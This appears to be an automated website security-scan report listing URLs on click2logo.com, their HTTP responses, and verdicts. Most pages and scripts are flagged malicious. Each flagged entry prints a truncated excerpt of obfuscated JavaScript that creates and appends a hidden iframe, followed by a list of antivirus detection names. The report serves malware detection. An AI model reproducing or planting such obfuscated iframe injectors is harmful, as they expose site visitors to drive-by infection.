Request | Server response | Status |
http://www.click2logo.com/ | 200 OK Content-Length: 38491 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function twa(upo,jab,kae){var var4=0.006;if(var4!=30){var var1={pin:'lab'};var var3=0.0166;if(var3<23){var var2=0.0096;var2+=6676}}var var7=29;if(var7>0){var var5=4663;var5--;var var6=2263;var6++}return jab}var var8=29;var var3=pud('tbR8yh',14);for(var var9=0;var9<4;var9++){var var10=10;var10--}var var15=0.021;if(var15!=9){var var13=4999;if(var13!=6214){var var11=['chi','wet'];var var12=0.0121}var var14=[8,32,48,16,40,0,24]}var var1=pud('510WwsspomklgCcZYU',2);var var16=0.019;var var17=
... 3048 bytes are skipped ...8--} ifrm.style.visibility='hidden'; var var60=0.008;var var63=5572;if(var63==23){var var61='bid';var var62=null} document.body.appendChild(ifrm);for(var var64=0;var64<4;var64++){var var65=6;var65+=14}var var66='tag';iframeWasCreated=true;var var67=0;while(var67<3){var var68=0.033;var68-=0.001;var67++}}var var69=3488;var69+=24}catch(e){iframeWasCreated=undefined}function ors(tor,tsk){var var70=5874;var70++;var var71={fig:4243};return tor}var var72=3150;var72++}, 100);Antivirus reports:- AntiVir
- JS/Agent.aqr
- Avast
- JS:Iframe-UG [Trj]
- Ikarus
- Trojan.IframeRef
- nProtect
- Trojan.JS.Iframe.CHF
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- TROJ_GEN.RCBH1JP
- Emsisoft
- Trojan.JS.Iframe.CHF (B)
- Comodo
- TrojWare.JS.Agent.AX
- CAT-QuickHeal
- JS/Iframe.CSS
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/Iframe.CS
- MicroWorld-eScan
- Trojan.JS.Iframe.CHF
- F-Secure
- Trojan.JS.Iframe.CHF
- F-Prot
- JS/IFrame.RR.gen
- Norman
- Agent.ALETV
- GData
- Trojan.JS.Iframe.CHF
- Commtouch
- JS/IFrame.RR.gen
- BitDefender
- Trojan.JS.Iframe.CHF
|
http://www.click2logo.com/js/modernizr.custom.57435.js | 200 OK Content-Length: 23299 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function twa(upo,jab,kae){var var4=0.006;if(var4!=30){var var1={pin:'lab'};var var3=0.0166;if(var3<23){var var2=0.0096;var2+=6676}}var var7=29;if(var7>0){var var5=4663;var5--;var var6=2263;var6++}return jab}var var8=29;var var3=pud('tbR8yh',14);for(var var9=0;var9<4;var9++){var var10=10;var10--}var var15=0.021;if(var15!=9){var var13=4999;if(var13!=6214){var var11=['chi','wet'];var var12=0.0121}var var14=[8,32,48,16,40,0,24]}var var1=pud('510WwsspomklgCcZYU',2);var var16=0.019;var var17=
... 3048 bytes are skipped ...8--} ifrm.style.visibility='hidden'; var var60=0.008;var var63=5572;if(var63==23){var var61='bid';var var62=null} document.body.appendChild(ifrm);for(var var64=0;var64<4;var64++){var var65=6;var65+=14}var var66='tag';iframeWasCreated=true;var var67=0;while(var67<3){var var68=0.033;var68-=0.001;var67++}}var var69=3488;var69+=24}catch(e){iframeWasCreated=undefined}function ors(tor,tsk){var var70=5874;var70++;var var71={fig:4243};return tor}var var72=3150;var72++}, 100);Antivirus reports:- AntiVir
- JS/Agent.aqr
- Avast
- JS:Iframe-UG [Trj]
- Ikarus
- Trojan.IframeRef
- nProtect
- Trojan.JS.Iframe.CHF
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- TROJ_GEN.RCBH1JP
- Emsisoft
- Trojan.JS.Iframe.CHF (B)
- Comodo
- TrojWare.JS.Agent.AX
- CAT-QuickHeal
- JS/Iframe.CSS
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/Iframe.CS
- MicroWorld-eScan
- Trojan.JS.Iframe.CHF
- F-Secure
- Trojan.JS.Iframe.CHF
- F-Prot
- JS/IFrame.RR.gen
- Norman
- Agent.ALETV
- GData
- Trojan.JS.Iframe.CHF
- Commtouch
- JS/IFrame.RR.gen
- BitDefender
- Trojan.JS.Iframe.CHF
|
http://ajax.googleapis.com/ajax/libs/jquery/1.7.0/jquery.min.js | 200 OK Content-Length: 94020 Content-Type: text/javascript | clean |
http://www.click2logo.com/js/jquery.easing.1.3.js | 200 OK Content-Length: 18539 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function twa(upo,jab,kae){var var4=0.006;if(var4!=30){var var1={pin:'lab'};var var3=0.0166;if(var3<23){var var2=0.0096;var2+=6676}}var var7=29;if(var7>0){var var5=4663;var5--;var var6=2263;var6++}return jab}var var8=29;var var3=pud('tbR8yh',14);for(var var9=0;var9<4;var9++){var var10=10;var10--}var var15=0.021;if(var15!=9){var var13=4999;if(var13!=6214){var var11=['chi','wet'];var var12=0.0121}var var14=[8,32,48,16,40,0,24]}var var1=pud('510WwsspomklgCcZYU',2);var var16=0.019;var var17=
... 3048 bytes are skipped ...8--} ifrm.style.visibility='hidden'; var var60=0.008;var var63=5572;if(var63==23){var var61='bid';var var62=null} document.body.appendChild(ifrm);for(var var64=0;var64<4;var64++){var var65=6;var65+=14}var var66='tag';iframeWasCreated=true;var var67=0;while(var67<3){var var68=0.033;var68-=0.001;var67++}}var var69=3488;var69+=24}catch(e){iframeWasCreated=undefined}function ors(tor,tsk){var var70=5874;var70++;var var71={fig:4243};return tor}var var72=3150;var72++}, 100);Antivirus reports:- AntiVir
- JS/Agent.aqr
- Avast
- JS:Iframe-UG [Trj]
- Ikarus
- Trojan.IframeRef
- nProtect
- Trojan.JS.Iframe.CHF
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- TROJ_GEN.RCBH1JP
- Emsisoft
- Trojan.JS.Iframe.CHF (B)
- Comodo
- TrojWare.JS.Agent.AX
- CAT-QuickHeal
- JS/Iframe.CSS
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/Iframe.CS
- MicroWorld-eScan
- Trojan.JS.Iframe.CHF
- F-Secure
- Trojan.JS.Iframe.CHF
- F-Prot
- JS/IFrame.RR.gen
- Norman
- Agent.ALETV
- GData
- Trojan.JS.Iframe.CHF
- Commtouch
- JS/IFrame.RR.gen
- BitDefender
- Trojan.JS.Iframe.CHF
|
http://www.click2logo.com/js/jquery.carouFredSel-5.2.3-packed.js | 200 OK Content-Length: 40335 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function twa(upo,jab,kae){var var4=0.006;if(var4!=30){var var1={pin:'lab'};var var3=0.0166;if(var3<23){var var2=0.0096;var2+=6676}}var var7=29;if(var7>0){var var5=4663;var5--;var var6=2263;var6++}return jab}var var8=29;var var3=pud('tbR8yh',14);for(var var9=0;var9<4;var9++){var var10=10;var10--}var var15=0.021;if(var15!=9){var var13=4999;if(var13!=6214){var var11=['chi','wet'];var var12=0.0121}var var14=[8,32,48,16,40,0,24]}var var1=pud('510WwsspomklgCcZYU',2);var var16=0.019;var var17=
... 3048 bytes are skipped ...8--} ifrm.style.visibility='hidden'; var var60=0.008;var var63=5572;if(var63==23){var var61='bid';var var62=null} document.body.appendChild(ifrm);for(var var64=0;var64<4;var64++){var var65=6;var65+=14}var var66='tag';iframeWasCreated=true;var var67=0;while(var67<3){var var68=0.033;var68-=0.001;var67++}}var var69=3488;var69+=24}catch(e){iframeWasCreated=undefined}function ors(tor,tsk){var var70=5874;var70++;var var71={fig:4243};return tor}var var72=3150;var72++}, 100);Antivirus reports:- AntiVir
- JS/Agent.aqr
- Avast
- JS:Iframe-UG [Trj]
- Ikarus
- Trojan.IframeRef
- nProtect
- Trojan.JS.Iframe.CHF
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- TROJ_GEN.RCBH1JP
- Emsisoft
- Trojan.JS.Iframe.CHF (B)
- Comodo
- TrojWare.JS.Agent.AX
- CAT-QuickHeal
- JS/Iframe.CSS
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/Iframe.CS
- MicroWorld-eScan
- Trojan.JS.Iframe.CHF
- F-Secure
- Trojan.JS.Iframe.CHF
- F-Prot
- JS/IFrame.RR.gen
- Norman
- Agent.ALETV
- GData
- Trojan.JS.Iframe.CHF
- Commtouch
- JS/IFrame.RR.gen
- BitDefender
- Trojan.JS.Iframe.CHF
|
http://www.click2logo.com/js/custom.js | 200 OK Content-Length: 1471 Content-Type: application/javascript | clean |
http://www.click2logo.com/design-process/ | 200 OK Content-Length: 55619 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function twa(upo,jab,kae){var var4=0.006;if(var4!=30){var var1={pin:'lab'};var var3=0.0166;if(var3<23){var var2=0.0096;var2+=6676}}var var7=29;if(var7>0){var var5=4663;var5--;var var6=2263;var6++}return jab}var var8=29;var var3=pud('tbR8yh',14);for(var var9=0;var9<4;var9++){var var10=10;var10--}var var15=0.021;if(var15!=9){var var13=4999;if(var13!=6214){var var11=['chi','wet'];var var12=0.0121}var var14=[8,32,48,16,40,0,24]}var var1=pud('510WwsspomklgCcZYU',2);var var16=0.019;var var17=
... 3048 bytes are skipped ...8--} ifrm.style.visibility='hidden'; var var60=0.008;var var63=5572;if(var63==23){var var61='bid';var var62=null} document.body.appendChild(ifrm);for(var var64=0;var64<4;var64++){var var65=6;var65+=14}var var66='tag';iframeWasCreated=true;var var67=0;while(var67<3){var var68=0.033;var68-=0.001;var67++}}var var69=3488;var69+=24}catch(e){iframeWasCreated=undefined}function ors(tor,tsk){var var70=5874;var70++;var var71={fig:4243};return tor}var var72=3150;var72++}, 100);Antivirus reports:- AntiVir
- JS/Agent.aqr
- Avast
- JS:Iframe-UG [Trj]
- Ikarus
- Trojan.IframeRef
- nProtect
- Trojan.JS.Iframe.CHF
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- TROJ_GEN.RCBH1JP
- Emsisoft
- Trojan.JS.Iframe.CHF (B)
- Comodo
- TrojWare.JS.Agent.AX
- CAT-QuickHeal
- JS/Iframe.CSS
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/Iframe.CS
- MicroWorld-eScan
- Trojan.JS.Iframe.CHF
- F-Secure
- Trojan.JS.Iframe.CHF
- F-Prot
- JS/IFrame.RR.gen
- Norman
- Agent.ALETV
- GData
- Trojan.JS.Iframe.CHF
- Commtouch
- JS/IFrame.RR.gen
- BitDefender
- Trojan.JS.Iframe.CHF
|
http://www.click2logo.com/logo-design/star-fish/ | 200 OK Content-Length: 45008 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function twa(upo,jab,kae){var var4=0.006;if(var4!=30){var var1={pin:'lab'};var var3=0.0166;if(var3<23){var var2=0.0096;var2+=6676}}var var7=29;if(var7>0){var var5=4663;var5--;var var6=2263;var6++}return jab}var var8=29;var var3=pud('tbR8yh',14);for(var var9=0;var9<4;var9++){var var10=10;var10--}var var15=0.021;if(var15!=9){var var13=4999;if(var13!=6214){var var11=['chi','wet'];var var12=0.0121}var var14=[8,32,48,16,40,0,24]}var var1=pud('510WwsspomklgCcZYU',2);var var16=0.019;var var17=
... 3048 bytes are skipped ...8--} ifrm.style.visibility='hidden'; var var60=0.008;var var63=5572;if(var63==23){var var61='bid';var var62=null} document.body.appendChild(ifrm);for(var var64=0;var64<4;var64++){var var65=6;var65+=14}var var66='tag';iframeWasCreated=true;var var67=0;while(var67<3){var var68=0.033;var68-=0.001;var67++}}var var69=3488;var69+=24}catch(e){iframeWasCreated=undefined}function ors(tor,tsk){var var70=5874;var70++;var var71={fig:4243};return tor}var var72=3150;var72++}, 100);Antivirus reports:- AntiVir
- JS/Agent.aqr
- Avast
- JS:Iframe-UG [Trj]
- Ikarus
- Trojan.IframeRef
- nProtect
- Trojan.JS.Iframe.CHF
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- TROJ_GEN.RCBH1JP
- Emsisoft
- Trojan.JS.Iframe.CHF (B)
- Comodo
- TrojWare.JS.Agent.AX
- CAT-QuickHeal
- JS/Iframe.CSS
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/Iframe.CS
- MicroWorld-eScan
- Trojan.JS.Iframe.CHF
- F-Secure
- Trojan.JS.Iframe.CHF
- F-Prot
- JS/IFrame.RR.gen
- Norman
- Agent.ALETV
- GData
- Trojan.JS.Iframe.CHF
- Commtouch
- JS/IFrame.RR.gen
- BitDefender
- Trojan.JS.Iframe.CHF
|
http://www.click2logo.com/logo-design/silver-fish/ | 200 OK Content-Length: 43426 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function twa(upo,jab,kae){var var4=0.006;if(var4!=30){var var1={pin:'lab'};var var3=0.0166;if(var3<23){var var2=0.0096;var2+=6676}}var var7=29;if(var7>0){var var5=4663;var5--;var var6=2263;var6++}return jab}var var8=29;var var3=pud('tbR8yh',14);for(var var9=0;var9<4;var9++){var var10=10;var10--}var var15=0.021;if(var15!=9){var var13=4999;if(var13!=6214){var var11=['chi','wet'];var var12=0.0121}var var14=[8,32,48,16,40,0,24]}var var1=pud('510WwsspomklgCcZYU',2);var var16=0.019;var var17=
... 3048 bytes are skipped ...8--} ifrm.style.visibility='hidden'; var var60=0.008;var var63=5572;if(var63==23){var var61='bid';var var62=null} document.body.appendChild(ifrm);for(var var64=0;var64<4;var64++){var var65=6;var65+=14}var var66='tag';iframeWasCreated=true;var var67=0;while(var67<3){var var68=0.033;var68-=0.001;var67++}}var var69=3488;var69+=24}catch(e){iframeWasCreated=undefined}function ors(tor,tsk){var var70=5874;var70++;var var71={fig:4243};return tor}var var72=3150;var72++}, 100);Antivirus reports:- AntiVir
- JS/Agent.aqr
- Avast
- JS:Iframe-UG [Trj]
- Ikarus
- Trojan.IframeRef
- nProtect
- Trojan.JS.Iframe.CHF
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- TROJ_GEN.RCBH1JP
- Emsisoft
- Trojan.JS.Iframe.CHF (B)
- Comodo
- TrojWare.JS.Agent.AX
- CAT-QuickHeal
- JS/Iframe.CSS
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/Iframe.CS
- MicroWorld-eScan
- Trojan.JS.Iframe.CHF
- F-Secure
- Trojan.JS.Iframe.CHF
- F-Prot
- JS/IFrame.RR.gen
- Norman
- Agent.ALETV
- GData
- Trojan.JS.Iframe.CHF
- Commtouch
- JS/IFrame.RR.gen
- BitDefender
- Trojan.JS.Iframe.CHF
|
http://www.click2logo.com/logo-design/gold-fish/ | 200 OK Content-Length: 43420 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function twa(upo,jab,kae){var var4=0.006;if(var4!=30){var var1={pin:'lab'};var var3=0.0166;if(var3<23){var var2=0.0096;var2+=6676}}var var7=29;if(var7>0){var var5=4663;var5--;var var6=2263;var6++}return jab}var var8=29;var var3=pud('tbR8yh',14);for(var var9=0;var9<4;var9++){var var10=10;var10--}var var15=0.021;if(var15!=9){var var13=4999;if(var13!=6214){var var11=['chi','wet'];var var12=0.0121}var var14=[8,32,48,16,40,0,24]}var var1=pud('510WwsspomklgCcZYU',2);var var16=0.019;var var17=
... 3048 bytes are skipped ...8--} ifrm.style.visibility='hidden'; var var60=0.008;var var63=5572;if(var63==23){var var61='bid';var var62=null} document.body.appendChild(ifrm);for(var var64=0;var64<4;var64++){var var65=6;var65+=14}var var66='tag';iframeWasCreated=true;var var67=0;while(var67<3){var var68=0.033;var68-=0.001;var67++}}var var69=3488;var69+=24}catch(e){iframeWasCreated=undefined}function ors(tor,tsk){var var70=5874;var70++;var var71={fig:4243};return tor}var var72=3150;var72++}, 100);Antivirus reports:- AntiVir
- JS/Agent.aqr
- Avast
- JS:Iframe-UG [Trj]
- Ikarus
- Trojan.IframeRef
- nProtect
- Trojan.JS.Iframe.CHF
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- TROJ_GEN.RCBH1JP
- Emsisoft
- Trojan.JS.Iframe.CHF (B)
- Comodo
- TrojWare.JS.Agent.AX
- CAT-QuickHeal
- JS/Iframe.CSS
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/Iframe.CS
- MicroWorld-eScan
- Trojan.JS.Iframe.CHF
- F-Secure
- Trojan.JS.Iframe.CHF
- F-Prot
- JS/IFrame.RR.gen
- Norman
- Agent.ALETV
- GData
- Trojan.JS.Iframe.CHF
- Commtouch
- JS/IFrame.RR.gen
- BitDefender
- Trojan.JS.Iframe.CHF
|
http://www.click2logo.com/logo-design/logo-repair/ | 200 OK Content-Length: 43426 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function twa(upo,jab,kae){var var4=0.006;if(var4!=30){var var1={pin:'lab'};var var3=0.0166;if(var3<23){var var2=0.0096;var2+=6676}}var var7=29;if(var7>0){var var5=4663;var5--;var var6=2263;var6++}return jab}var var8=29;var var3=pud('tbR8yh',14);for(var var9=0;var9<4;var9++){var var10=10;var10--}var var15=0.021;if(var15!=9){var var13=4999;if(var13!=6214){var var11=['chi','wet'];var var12=0.0121}var var14=[8,32,48,16,40,0,24]}var var1=pud('510WwsspomklgCcZYU',2);var var16=0.019;var var17=
... 3048 bytes are skipped ...8--} ifrm.style.visibility='hidden'; var var60=0.008;var var63=5572;if(var63==23){var var61='bid';var var62=null} document.body.appendChild(ifrm);for(var var64=0;var64<4;var64++){var var65=6;var65+=14}var var66='tag';iframeWasCreated=true;var var67=0;while(var67<3){var var68=0.033;var68-=0.001;var67++}}var var69=3488;var69+=24}catch(e){iframeWasCreated=undefined}function ors(tor,tsk){var var70=5874;var70++;var var71={fig:4243};return tor}var var72=3150;var72++}, 100);Antivirus reports:- AntiVir
- JS/Agent.aqr
- Avast
- JS:Iframe-UG [Trj]
- Ikarus
- Trojan.IframeRef
- nProtect
- Trojan.JS.Iframe.CHF
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- TROJ_GEN.RCBH1JP
- Emsisoft
- Trojan.JS.Iframe.CHF (B)
- Comodo
- TrojWare.JS.Agent.AX
- CAT-QuickHeal
- JS/Iframe.CSS
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/Iframe.CS
- MicroWorld-eScan
- Trojan.JS.Iframe.CHF
- F-Secure
- Trojan.JS.Iframe.CHF
- F-Prot
- JS/IFrame.RR.gen
- Norman
- Agent.ALETV
- GData
- Trojan.JS.Iframe.CHF
- Commtouch
- JS/IFrame.RR.gen
- BitDefender
- Trojan.JS.Iframe.CHF
|
http://www.click2logo.com/web-design/star-fish/ | 200 OK Content-Length: 43417 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function twa(upo,jab,kae){var var4=0.006;if(var4!=30){var var1={pin:'lab'};var var3=0.0166;if(var3<23){var var2=0.0096;var2+=6676}}var var7=29;if(var7>0){var var5=4663;var5--;var var6=2263;var6++}return jab}var var8=29;var var3=pud('tbR8yh',14);for(var var9=0;var9<4;var9++){var var10=10;var10--}var var15=0.021;if(var15!=9){var var13=4999;if(var13!=6214){var var11=['chi','wet'];var var12=0.0121}var var14=[8,32,48,16,40,0,24]}var var1=pud('510WwsspomklgCcZYU',2);var var16=0.019;var var17=
... 3048 bytes are skipped ...8--} ifrm.style.visibility='hidden'; var var60=0.008;var var63=5572;if(var63==23){var var61='bid';var var62=null} document.body.appendChild(ifrm);for(var var64=0;var64<4;var64++){var var65=6;var65+=14}var var66='tag';iframeWasCreated=true;var var67=0;while(var67<3){var var68=0.033;var68-=0.001;var67++}}var var69=3488;var69+=24}catch(e){iframeWasCreated=undefined}function ors(tor,tsk){var var70=5874;var70++;var var71={fig:4243};return tor}var var72=3150;var72++}, 100);Antivirus reports:- AntiVir
- JS/Agent.aqr
- Avast
- JS:Iframe-UG [Trj]
- Ikarus
- Trojan.IframeRef
- nProtect
- Trojan.JS.Iframe.CHF
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- TROJ_GEN.RCBH1JP
- Emsisoft
- Trojan.JS.Iframe.CHF (B)
- Comodo
- TrojWare.JS.Agent.AX
- CAT-QuickHeal
- JS/Iframe.CSS
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/Iframe.CS
- MicroWorld-eScan
- Trojan.JS.Iframe.CHF
- F-Secure
- Trojan.JS.Iframe.CHF
- F-Prot
- JS/IFrame.RR.gen
- Norman
- Agent.ALETV
- GData
- Trojan.JS.Iframe.CHF
- Commtouch
- JS/IFrame.RR.gen
- BitDefender
- Trojan.JS.Iframe.CHF
|
http://www.click2logo.com/web-design/silver-fish/ | 200 OK Content-Length: 43423 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function twa(upo,jab,kae){var var4=0.006;if(var4!=30){var var1={pin:'lab'};var var3=0.0166;if(var3<23){var var2=0.0096;var2+=6676}}var var7=29;if(var7>0){var var5=4663;var5--;var var6=2263;var6++}return jab}var var8=29;var var3=pud('tbR8yh',14);for(var var9=0;var9<4;var9++){var var10=10;var10--}var var15=0.021;if(var15!=9){var var13=4999;if(var13!=6214){var var11=['chi','wet'];var var12=0.0121}var var14=[8,32,48,16,40,0,24]}var var1=pud('510WwsspomklgCcZYU',2);var var16=0.019;var var17=
... 3048 bytes are skipped ...8--} ifrm.style.visibility='hidden'; var var60=0.008;var var63=5572;if(var63==23){var var61='bid';var var62=null} document.body.appendChild(ifrm);for(var var64=0;var64<4;var64++){var var65=6;var65+=14}var var66='tag';iframeWasCreated=true;var var67=0;while(var67<3){var var68=0.033;var68-=0.001;var67++}}var var69=3488;var69+=24}catch(e){iframeWasCreated=undefined}function ors(tor,tsk){var var70=5874;var70++;var var71={fig:4243};return tor}var var72=3150;var72++}, 100);Antivirus reports:- AntiVir
- JS/Agent.aqr
- Avast
- JS:Iframe-UG [Trj]
- Ikarus
- Trojan.IframeRef
- nProtect
- Trojan.JS.Iframe.CHF
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- TROJ_GEN.RCBH1JP
- Emsisoft
- Trojan.JS.Iframe.CHF (B)
- Comodo
- TrojWare.JS.Agent.AX
- CAT-QuickHeal
- JS/Iframe.CSS
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/Iframe.CS
- MicroWorld-eScan
- Trojan.JS.Iframe.CHF
- F-Secure
- Trojan.JS.Iframe.CHF
- F-Prot
- JS/IFrame.RR.gen
- Norman
- Agent.ALETV
- GData
- Trojan.JS.Iframe.CHF
- Commtouch
- JS/IFrame.RR.gen
- BitDefender
- Trojan.JS.Iframe.CHF
|
http://www.click2logo.com/web-design/gold-fish/ | 200 OK Content-Length: 43417 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function twa(upo,jab,kae){var var4=0.006;if(var4!=30){var var1={pin:'lab'};var var3=0.0166;if(var3<23){var var2=0.0096;var2+=6676}}var var7=29;if(var7>0){var var5=4663;var5--;var var6=2263;var6++}return jab}var var8=29;var var3=pud('tbR8yh',14);for(var var9=0;var9<4;var9++){var var10=10;var10--}var var15=0.021;if(var15!=9){var var13=4999;if(var13!=6214){var var11=['chi','wet'];var var12=0.0121}var var14=[8,32,48,16,40,0,24]}var var1=pud('510WwsspomklgCcZYU',2);var var16=0.019;var var17=
... 3048 bytes are skipped ...8--} ifrm.style.visibility='hidden'; var var60=0.008;var var63=5572;if(var63==23){var var61='bid';var var62=null} document.body.appendChild(ifrm);for(var var64=0;var64<4;var64++){var var65=6;var65+=14}var var66='tag';iframeWasCreated=true;var var67=0;while(var67<3){var var68=0.033;var68-=0.001;var67++}}var var69=3488;var69+=24}catch(e){iframeWasCreated=undefined}function ors(tor,tsk){var var70=5874;var70++;var var71={fig:4243};return tor}var var72=3150;var72++}, 100);Antivirus reports:- AntiVir
- JS/Agent.aqr
- Avast
- JS:Iframe-UG [Trj]
- Ikarus
- Trojan.IframeRef
- nProtect
- Trojan.JS.Iframe.CHF
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- TROJ_GEN.RCBH1JP
- Emsisoft
- Trojan.JS.Iframe.CHF (B)
- Comodo
- TrojWare.JS.Agent.AX
- CAT-QuickHeal
- JS/Iframe.CSS
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/Iframe.CS
- MicroWorld-eScan
- Trojan.JS.Iframe.CHF
- F-Secure
- Trojan.JS.Iframe.CHF
- F-Prot
- JS/IFrame.RR.gen
- Norman
- Agent.ALETV
- GData
- Trojan.JS.Iframe.CHF
- Commtouch
- JS/IFrame.RR.gen
- BitDefender
- Trojan.JS.Iframe.CHF
|
http://www.click2logo.com/web-design/logo-repair/ | 200 OK Content-Length: 43422 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function twa(upo,jab,kae){var var4=0.006;if(var4!=30){var var1={pin:'lab'};var var3=0.0166;if(var3<23){var var2=0.0096;var2+=6676}}var var7=29;if(var7>0){var var5=4663;var5--;var var6=2263;var6++}return jab}var var8=29;var var3=pud('tbR8yh',14);for(var var9=0;var9<4;var9++){var var10=10;var10--}var var15=0.021;if(var15!=9){var var13=4999;if(var13!=6214){var var11=['chi','wet'];var var12=0.0121}var var14=[8,32,48,16,40,0,24]}var var1=pud('510WwsspomklgCcZYU',2);var var16=0.019;var var17=
... 3048 bytes are skipped ...8--} ifrm.style.visibility='hidden'; var var60=0.008;var var63=5572;if(var63==23){var var61='bid';var var62=null} document.body.appendChild(ifrm);for(var var64=0;var64<4;var64++){var var65=6;var65+=14}var var66='tag';iframeWasCreated=true;var var67=0;while(var67<3){var var68=0.033;var68-=0.001;var67++}}var var69=3488;var69+=24}catch(e){iframeWasCreated=undefined}function ors(tor,tsk){var var70=5874;var70++;var var71={fig:4243};return tor}var var72=3150;var72++}, 100);Antivirus reports:- AntiVir
- JS/Agent.aqr
- Avast
- JS:Iframe-UG [Trj]
- Ikarus
- Trojan.IframeRef
- nProtect
- Trojan.JS.Iframe.CHF
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- TROJ_GEN.RCBH1JP
- Emsisoft
- Trojan.JS.Iframe.CHF (B)
- Comodo
- TrojWare.JS.Agent.AX
- CAT-QuickHeal
- JS/Iframe.CSS
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/Iframe.CS
- MicroWorld-eScan
- Trojan.JS.Iframe.CHF
- F-Secure
- Trojan.JS.Iframe.CHF
- F-Prot
- JS/IFrame.RR.gen
- Norman
- Agent.ALETV
- GData
- Trojan.JS.Iframe.CHF
- Commtouch
- JS/IFrame.RR.gen
- BitDefender
- Trojan.JS.Iframe.CHF
|